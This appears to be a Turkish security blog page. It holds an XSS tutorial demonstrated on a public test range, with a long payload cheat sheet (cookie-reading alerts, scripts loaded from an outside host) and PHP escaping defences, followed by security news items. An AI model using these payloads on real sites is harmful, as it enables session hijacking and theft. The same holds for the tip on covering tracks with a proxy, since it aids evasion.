XSS – Cross Site Scripting

Cross site scripting (XSS) HTML kodlarının arasına istemci tabanlı kod gömülmesi yoluyla kullanıcının tarayıcısında istenen istemci tabanlı kodun çalıştırılabilmesi olarak tanımlanır.

XSS’in temel mantığı siteler arası betik kod çalıştırmadır ve kullanıcı tarafından input kabul edilen yerlerde görülmektedir. Web uygulamalarında bulunan kullanıcı tarafından kabul edilen inputlar kontrol edilmeden direk koda dahil ediliyor ve kullanıcıya gösteriliyorsa, uygulama üzerinde Javascript koduda çalıştırılabilir. Eğer alınan input tag’ler ile kontrol edilmeye çalışılıyorsa basit HTML bilgisi ile o tag’leri devredışı bırakıp istenilen Javascript kodu çalıştırılabilir.

XSS anlatımını herkesin erişimine açık bulunan ve anlatım esnasında sizinde rahatça deneyip görebilmeniz için http://public-firing-range.appspot.com/ adresi üzerinden yapacağım. Bu websitesi XSS zafiyetlerini çeşitlerine göre ayırmıştır. Her XSS çeşitinin altında ise farklı parametreler üzerinde zafiyetin nerelerden kaynaklandığını görmemize yardımcı olmaktadır.

  1. Reflected XSS:

Alınan inputların uygulama üzerinde kaydedilmediği yerlerde görülür. Sadece o url’e sahip kişiler tarafından görülebilir/kullanılabilir/erişilebilir.  Web uygulamalarının arama alanları reflected xss’in en çok görüldüğü yerlerdir.

Örneğin: Ceh.com.tr üzerinde bir arama yapmak istediğim zaman arama yerine istediğim kelimeleri yazıp ara butonuna bastıktan sonra site aşağıdaki gibi bir url oluşturacaktır.Bu aradığımız kelimeler sistem üzerinde kaydedilmediği için bizden sonra gelen kullanıcılar sizin armaış olduğunuz şeyleri göremeyecektir. Bu yüzden bu XSS çeşitinin adı reflected (yansıyan) xss’dir.

http://www.ceh.com.tr/?s=burada+xss+var+mi?

Masumca yapmış olduğumuz yukarıdaki aramamız bize şu göstermektedir. Bizim search alanına yazmış olduğumuz kelimeler s parametresi üzerinde uygulama üzerinde çalışıyor. Yani siz aslında s parametresine birşeyler atıyorsunuz. Demo ortamımızda Javascript kodlarımızı uygulamanın parametre kabul ettiği yere yazalım ve enter’a basalım.

http://public-firing-range.appspot.com/reflected/parameter/body?q=ceh.com.tr

Screen Shot 2016-01-10 at 22.04.30

 

 

 

Görmüş olduğunuz gibi uygulama url üzerinde q parametresine input almaktadır. Kaynak koduna baktığımızda ise hiçbir önlem alınmadan alınan inputun direk koda eklendiğini görmekteyiz.

Screen Shot 2016-01-10 at 22.04.45

 

 

 

 

Şimdi q parametresine ceh.com.tr yerine birkaç javascript kodu verelim.

Screen Shot 2016-01-10 at 22.08.53

Görmüş olduğunuz gibi javascript kodumuz direk site üzerinde çalıştı. Çalıştırmış olduğumuz sadece içerisinde CEH.com.tr yazılı basit bir uyarı penceresi. <script>alert(“CEH.com.tr”)</script> Verilen input sonrası uygulamanın kaynak kodu aşağıdaki gibi görünmektedir.

Screen Shot 2016-01-10 at 22.09.08

Aklınıza gelen başka Javascript kodlarınıda parametre olarak verebilirsiniz. Aşağıda da bazı javascript kodlarını paylaşıyor olacağım.

Reflected XSS bazen yukarıdaki kadar kolay ulaşılamayabilir. Yukarıda da bahsetmiş olduğum gibi parametre ile alınan değer tag’ler içersinde yazılıyor olabilir. Buda Javascript kodlarının normal text olarak algılanması demektir yani Javascript kodları uygulama üzerinde çalışmayacaktır.

Screen Shot 2016-01-10 at 22.18.23

Kaynak kodu

Screen Shot 2016-01-10 at 22.19.21

Yukarıda görüldüğü gibi q parametresi ile alınan input <title> </title> tag’leri arasına yazılmaktadır. Burada bir trick yaparak parametreye bu tag’in kapanış tag’ini vereceğiz devamında da javascript kodumuzu yazacağız. Uygulamanın kaynak kodu aşağıdaki gibi olacaktır.

http://public-firing-range.appspot.com/reflected/parameter/title?q=</title> <script>alert(“CEH.com.tr”)</script>

Screen Shot 2016-01-10 at 22.28.05

Kaynak kod

Screen Shot 2016-01-10 at 22.28.17

Eğer <title> tag’ini kapatmadan input olarak Javascript kodumuzu vermiş olsaydık uygulama üzerinde kodumuz çalışmayacak ve kaynak kodumuz aşağıdaki gibi olacaktı.

Screen Shot 2016-01-10 at 22.30.54

     2. Stored XSS:
Stored XSS zafiyeti Reflected XSS’e göre daha tehlikeli saldırı yöntemlerinden biridir.Kullanıcılardan alınan inputların uygulama database’ine kaydedildiği alanlarda bulunmaktadır. Örneğin, ziyaretçi defteri tarzındaki bir uygulamada yazılanlar database’e kaydedilmektedir ve gelen her kullanıcı bu yazıları görebilmektedir. Bu alana tag’leri bypass ederek yazılan zararlı javascript kodlarıyla o sayfayı ziyaret eden tüm kullanıcılara bulaştırmış olunacaktır.

    3. DOM-Based XSS Saldırısı:
DOM-Based XSS saldırısı tespit edilmesi en zor aynı zamanda bıraktığı etki açısından en tehlikeli XSS saldırı türüdür. JavaScript kodlarının zararlı bir şekilde kullanılması ile yapılır. Bu saldırı türünde kullanılan DOM nesneleri ile hedef web sitesinin index’i değiştirilebilir, sayfanın kodları değiştirilebilir, zararlı yazılımlar sayfaya yüklenebilir.

Dom-Based XSS için geniş anlatım daha sonra yapılacaktır.

XSS için çokça kullanılan Javascript kodları

script>alert(‘XSS’)</script>
‘><script>alert(‘XSS’)</script>
“><script>alert(‘XSS’)</script>
“><script>alert(‘XSS’)</script>
javascript;alert(‘XSS’)
<title>XSS</title>
“><script>alert(‘xss’);</script>+
“><script>alert(‘X’);</script>”><script>alert(‘X’);</script> == X
“>’<’script’>alert(’xss’)</’script>
‘><script>alert(document.cookie)</script>
=’><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(XSS)</script>
%3Cscript%3Ealert(‘XSS’)%3C/script%3E
<s&#99;ript>alert(‘XSS’)</script>
<img src=”/javas&#99;ript:alert(‘XSS’)”>
%0a%0a<script>alert(\”XSS\”)</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
&lt;script&gt;alert(‘XSS’);&lt;/script&gt
<script>alert(‘XSS’)</script>
a.jsp/<script>alert(‘XSS’)</script>
a?<script>alert(‘XSS’)</script>
“><script>alert(‘XSS’)</script>
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document.domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
”;!–“<XSS>=&{()}
<IMG SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=javascript:alert(‘XSS’)>
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
<IMG SRC=JaVaScRiPt:alert(&quot;XSS&quot;)>
<IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>
<IMG SRC=”jav&#x0A;ascript:alert(‘XSS’);”>
<IMG SRC=”jav&#x0D;ascript:alert(‘XSS’);”>
“<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
<IMG SRC=” javascript:alert(‘XSS’);”>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
<BODY ONLOAD=alert(‘XSS’)>
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
<br size=”&{alert(‘XSS’)}”>
<LAYER SRC=”http://xss.ha.ckers.org/a.js”></layer>
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
<IMG SRC=’vbscript:msgbox(“XSS”)’>
<IMG SRC=”mocha:[code]”>
<IMG SRC=”livescript:[code]”>
<META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XSS’);”>
<IFRAME SRC=javascript:alert(‘XSS’)></IFRAME>
<FRAMESET><FRAME SRC=javascript:alert(‘XSS’)></FRAME></FRAMESET>
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
<DIV STYLE=”behaviour: url(‘/xss’);”>
<DIV STYLE=”width: expression(alert(‘XSS’));”>
<STYLE>@im\port’\ja\vasc\ript:alert(“XSS”)’;</STYLE>
<IMG STYLE=’xss:expre\ssion(alert(“XSS”))’>
<STYLE TYPE=”text/javascript”>alert(‘XSS’);</STYLE>
<STYLE TYPE=”text/css”>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
<BASE HREF=”javascript:alert(‘XSS’);//”>
getURL(“javascript:alert(‘XSS’)”)
“> <BODY ONLOAD=”a();”><SCRIPT>function a(){alert(‘XSS’);}</SCRIPT><”
<SCRIPT SRC=”http://xss.ha.ckers.org/xss.jpg”></SCRIPT>
<IMG SRC=”javascript:alert(‘XSS’)

 

XSS Saldırı Mantığı:

  • Web uygulaması üzerinde bulunan XSS zafiyeti kullanılarak, siteyi ziyaret eden veya oluşturduğumuz sniffer’ı göndermiş olduğumuz hedef kullanıcıların oturum bilgileri çalınabilir. (Cookie Hijacking Saldırısı)
  • Javascript kodları sayesinde ziyaretçi kandırılarak bilgisayarına zararlı yazılım indirtilebilir. Böylece ziyaretçilerin kimlik bilgileri, şifreleri çalınabilir. Ziyaretçinin bilgisayarı botnete ağına bağlanarak zombie bilgisayar haline getirilebilir.
  • Sitenin anasayfası değiştirilebilir. Site defaced edilebilir. (DOM Based XSS yöntemi ile)
  • Sunucuya zararlı dosyalar (Shell, Backdoor gibi) yüklenebilir, kredi kartı, kişisel bilgiler v.s gibi bilgiler elde edilebilir (DOM Based XSS ile)

Peki hangi önlemler Alabiliriz?

İlk başta alınacak önlem kullanıcıdan alınan inputlarda ve URL satırında ` % ‘ ; / ? : @ = & <> \ ^~ [ ] { } “ # | karakterlerini filtreleyin. Bunun haricinde aşağıdaki yöntemleride güvenli kod yazımı olarak değerlendirip XSS zafiyetine yakalanmaktan kurtulmanızı sağlayacaktır.

Kullanacağınız Fonksiyonlar,
# htmlspecialchars();

* ’&’ (ve imi) ’&amp;’ haline gelir.
* ’”’ (çift tırnak) ENT_NOQUOTES belirtilmişse ’&quot;’ haline gelir.
* ’’’ (tek tırnak) ENT_QUOTES belirtilmişse ’’’ haline gelir.
* ’<’ (küçüktür) ’&lt;’ haline gelir
* ’>’ (büyüktür) ’&gt;’ haline gelir

# strip_tags();
” karakterinin başına \\\\ getirerek XSS’i önler, fonksiyon kullanımı

$aranan = htmlspecialchars($_GET[’go’]);
$aranan = strip_tags($aranan);
echo “aranan kelime > “.$aranan.””;

Kaynaklar:

https://www.owasp.org/index.php/XSS

https://www.owasp.org/index.php/DOM_Based_XSS

http://public-firing-range.appspot.com

http://excess-xss.com/

https://xss-game.appspot.com/

Yeni bir Crimekit “Atrax”

atrax

Siber suçluların kullanması için yeni bir crimekit piyasaya sürüldü. Atrax adındaki yeni crimekit sadece 250 dolara gizli haberleşme olanaklarına sahip bir siber suç merkezi olarak hizmet veriyor.

Atrax’ın tüm iletişimi TOR üzerinden sağlanıyor ve komuta kontrol sunucuları da TOR üzerinde çalışıyor. Fakat Atrax’ın gerçek gücü sadece bu değil. Aralarında form yakalama, DDoS modülü, Bitcoin/Litecoin miner, browserlardan veri çalma gibi pek çok özelliğin bulunduğu geniş bir fonksiyon listesi var. Atrax’ın övündüğü diğer bir özelliği ise Windows 8 destekleyen ilk bot çözümü olduğu. Okumaya devam et “Yeni bir Crimekit “Atrax””

Anonymous İsrail’i internetten sileriz!

1353177501-thousands-protest-at-israeli-embassy-as-fears-of-ground-offensive-grow_1607488

Anonymous İsrail’i internetten sileriz! – İnternet Haberleri

Anоnymоuѕ, ikinсi kez İsrail’е karşı sіber ѕaldırı bаşlаttı. İѕrailli уetkililer, hacker grubunun başarılı оlamadığını bеlіrttі. Anonymouѕ, İsraіl’і Fіlіstіn halkına yaptığı zulümdеn dоlaуı ‘intеrnеttеn ѕilmеklе’ tеhdіt еtti.

Okumaya devam et “Anonymous İsrail’i internetten sileriz!”

Black Hat Istanbul’da…

black_hat_hacker___wallpaper_v2_by_s3ctur3-d4kcn17
balck hat

Black Hat, bilişim ve bilgi güvenliği alanındaki üst düzey profesyoneller, pratisyenler, karar mercileri ve uygulayıcılar için trendler ve piyasa incelemeleri üzerine hem teknik hem de yüksek düzeyli tartışmalar sağlayarak; samimi bir fikir alışverişi ve eğitim imkânı sunan uluslararası etkinlikler olarak bilinmektedir. Tüm dünyada kıdemli IT ve bilgi güvenliği profesyonellerini buluşturan Black Hat etkinlikleri, aynı zamanda karar mercilerini ve üst düzey yöneticileri ilgilendiren güvenlik konularında, teknik eğitimlerin yanı sıra makro seviyede piyasa ve trend analizleri de sunmaktadır.

Okumaya devam et “Black Hat Istanbul’da…”

CTF (Capture The Flag) Yarışmaları…

Teknolojik imkanlara erişebilirliliğin arttığı, teknoloji bağımlısı gençlerin büyük bir ivme kazandığı, monitörlere yansıyan suretlerinin ekranlarında kalıcı izler bırakırcasına teknoloji ve zaman tüketiminin olduğu, belli bir kontrol mekanizması olmayan siber oluşumlara her geçen gün yeni aktörlerin eklendiği bir ortamda, birilerinin bu yeni ekonomi/yaşam modeli içerisindeki köşe kapma çabaları, gelecekte büyük sorunlar ortaya çıkaracağı sinyallerini veren siber dünyada devasa sorunlar ile boğuşacağımızı göstermektedir. Bu farkındalığın artması temennisi ile küçük bir vakıa analizi sunacağım..

Son zamanlarda Capture the flag yarışmaları popüler olmuş, bir çok yarışma duyurusu çeşitli mecralarda karşımıza çıkmıştır. Ee ne olmuş yani ne anlatmak istiyorsun diyebilirsiniz. Burada işaret etmek istediğim husus genelde bu yarışmaları düzenleyenlerin kurumsal yada kurumsallaşmaya giden girişim şirketlerinin olduğudur. 35 Milyon adet akıllı telefonun satıldığı bir ülkede, eline aldığı bir tableti yada bir kaç akıllı telefonu verip  “haydi CFT düzenliyoruz” demesi yukarıda işaret ettiğim sorunlara ışık tutmak yerine, sadece belli bir amaca hizmetten öteye geçememektedir.

Bu doğtultuda yapılan uygulamayı ve hedeflenen optimum faydayı eleştirmek istiyorum. Bu iş bir farketing:) unsuru olarak değerlendirilmemeli. Bir yarışma modeli kurarken kafalar kaldırılmalı ve etrafa bakılmalıdır.  Neler yapılmış bugüne kadar ve ne fayda amaçlanmış. Okumaya devam et “CTF (Capture The Flag) Yarışmaları…”

Polislerden Underground Çözümle

HOLLANDA’da polise, bilgisayarları hack’leme, bilgi toplama ve bilgileri yok etme yetkisi içeren bir yasa tasarısı hazırlandı.

Konuyla ilgili daha önce Temsilciler Meclisi’ne gönderdiği yazıda, polislere kişilerin bilgisayarlara dışardan izinsiz girme olanağı sağlanması gerektiğini savunan Güvenlik ve Adalet Bakanı Ivo Opstelten’in hazırladığı tasarı, önümüzdeki günlerde meclisin gündemine gelecek. İstihbarat örgütlerinin böyle bir olanağa sahip olduklarına dikkati çeken Opstelten, bu konuda polise izin verilmemesi nedeniyle suçla mücadelede sıkıntılar yaşandığını savunuyor.

Dijital ortamda özel hayatın ve kişisel hakların korunması yönünde çalışmalar yapan Bits of Freedom ile toplam 40 kuruluş, yasa tasarısına tepki gösterdi. Casus yazılımların yurt dışındaki bilgisayarlara da yerleştirilmesinin planlandığına dikkati çeken kuruluşlar, aynı yöntemi başka ülkelerin Hollanda’ya karşı da kullanabileceğini kaydetti.

Çamaşırsuyu kullanarak not düzeltme devri bitti:)

Yıldız Teknik Üniversitesi’nin sitesi bir grup öğrenci tarafından hack’lendi. Ancak bu öğrencilerin amacı bambaşka.

Redhack gibi hacker gruplarının siyasi içerikli eylemleriyle gündemde olduğu bir dönemde Yıldız Teknik Üniversitesi’nin sitesi bir grup öğrenci tarafından hack’lendi. Ancak bu öğrencilerin amacı bambaşka.

Öğrenciler, bilgi ve not kayıtlarının bulunduğu sisteme sızıp aldıkları düşük notları düzelttiler, yapılmamış stajları da yapılmış gibi gösterdiler. Hatta almadıkları dersleri de sistem üzerinde almış gibi gösterdiler. Hem de 2 yıl boyunca.

PROFESÖR FARK ETTİ

Türkiye’de eşine daha önce rastlanmamış olay, üniversitenin Bilgisayar Mühendisliği Bölüm Başkanı Prof. Dr. Nizamettin Aydın’ın dikkati sayesinde fark edildi. Bazı öğrencilerin notlarında değişiklik yapıldığından şüphelenen Nizamettin Aydın üniversite yönetimine ihbarda bulundu.

İhbarı değerlendiren yönetim, konuyla ilgili inceleme komisyonu kurulup olayın aydınlatılmasını istedi. Komisyon, bilgisayar sistemi, güvenlik açıkları, öğrencilerin notları, öğretim üyelerinin sisteme giriş çıkış durumları ve sistem içinde yaptıkları işlemleri tek tek inceledi.

HAYALET HACKER’LAR

Öğrencilerin; aldıkları notları, güvenlik duvarını profesyonelce hiçbir iz bırakmadan aştıkları tespit edildi. “Hayalet hacker’lar”ının belirlenmesi için sisteme giriş yapan tüm İP numaraları tek tek tarandı. Giriş çıkış zamanları şüpheli olan İP numaraları tespit edildi. Daha sonra bu İP’lerin yaptığı işlemler kontrol edildi. Hacker’ları ele verense bir dakikadan daha kısa sürede aynı İP ile sisteme giriş çıkış yapılması oldu.

Üniversite içi ve dışından aynı İP üzerinden sisteme 200’ü aşkın giriş-çıkış tespit edildi. Diğer taraftan öğrencilerin gerçek notları ile bilgisayar sistemindeki notları karşılaştırıldı.

ALTISININ İSMİ BELİRLENDİ

Notlarında değişik yapılmış olan ikisi mezun olmuş 6 öğrencinin ismi belirlendi. Bu öğrencilerin Bilgisayar Mühendisliği’nden Mehmet T., Burhanettin B., Hamit S., Afgan uyruklu Abdulquium M. ile Elektrik Mühendisliği Bölümü’nden Fatih A. ve Matematik Mühendisliği öğrencisi Mehmet K. oldukları ortaya çıkarıldı.

TEHLİKE DEVAM EDİYOR

Hacker öğrenciler hakkında suç duyurusunda bulunan üniversite yönetimi, yapılan işlemleri ayrıntılı bir şekilde anlattı. Ancak bu işlemlerin hangi güvenlik açığından faydalanarak yapıldığını ise tespit edemedi. Bu da tehlikenin hala giderilemediği anlamına geliyor. Bu şekilde kaç öğrencinin notuna müdahale edildiği de halen araştırılıyor.

Hayalet hacker’lardan Mehmet T.’nin 8, Abdulqaium M.’nin 2, Fatih A.’nın 17, Mehmet K.’nin 3 dersi gerçekte almadığı halde sisteme eklediği ve sanki almış gibi notlandırdığı belirlendi. Bunun yanı sıra Burhanettin B.’nin 8, Hamit S.’nin 3, Abdulqaium M.’nin 12, Fatih A.’nın 6, Mehmet K.’nin 7 ders notunda da değişiklik yaptığı tespit edildi.

HAYALİ STAJ YAPAN DA VAR

Üniversite yönetimi, Burhanettin B. ile Hamit S.’nin bilgi işlem sistemi üzerindeki kayıtlı staj durumları ile öğrenci dosyalarındaki staj kayıtlarının birbiriyle çeliştiğini ortaya çıkardı. İki kaydın örneğini de savcılığa sunan yönetim bu öğrencilerin stajlarını yapmayıp daha sonra sistem üzerinden staj günlerini düzelttiklerini bildirdi.

Çalınan 6,5 milyon Linkedin Şifrelerinin Anatomisi

Metasploit üreticisi Rapid7 güvenlik firması, tarafından yapılan bir araştırmaya göre, açığa çıkan Linkedin hesapları kullanıcıların tercih ettiği şifrelerle ilgili pek çok veri içeriyor.

Linkedin hesaplarının şifrelerinin çalınmasının ardından,  Last.fm’deki şifrelerin ele geçirildiğinin ortaya çıkması, sosyal ağlardaki güvenlik açıklarını ve şifre seçimlerindeki tercihlerimizi yeniden gündeme getirdi.

Linkedin’deki şifresi çalınan kullanıcılar şifreleri içerisinde en çok “link” kelimesini geçirmişler. Yine web sitesinin türü ve içeriği, kullanılan şifre ile bağıntılı. Profesyonel bir iş ağı olan Linkedin’de kullanıcıların şifreleri arasında “job” ve “work” gibi kelimeler bulunması bunun bir ispatı niteliğinde.

En büyük hatalardan birisi, birbirini takip eden 1234, 123456 gibi şifrelerin tercih edilmesi de şifre güvenliği açısından bir hayli endişe verici. Bir Rus hacker’ın, Linkedin üzerinde çaldığı 6,5 milyon şifrenin incelemesi ile toparlanan verilerden oluşturulan infografiği aşağıda inceleyebilirsiniz.

Proxy arkasında güvenli gezinti (ultrasurf)

ultrasurf-04-700x513

Bazı durumlarda iz bırakmadan testler / denemeler yapmak isteyebilirsiniz. Sizin sistemlerinizede bu şekilde erişim sağlanabileceğini unutmayınız. Küçük bir programdan bahsedeceğim size ama işlevi büyük bir program, ultrasurf. Bu programı ultrasurf.us sitesinden ücretsiz edinebilirsiniz.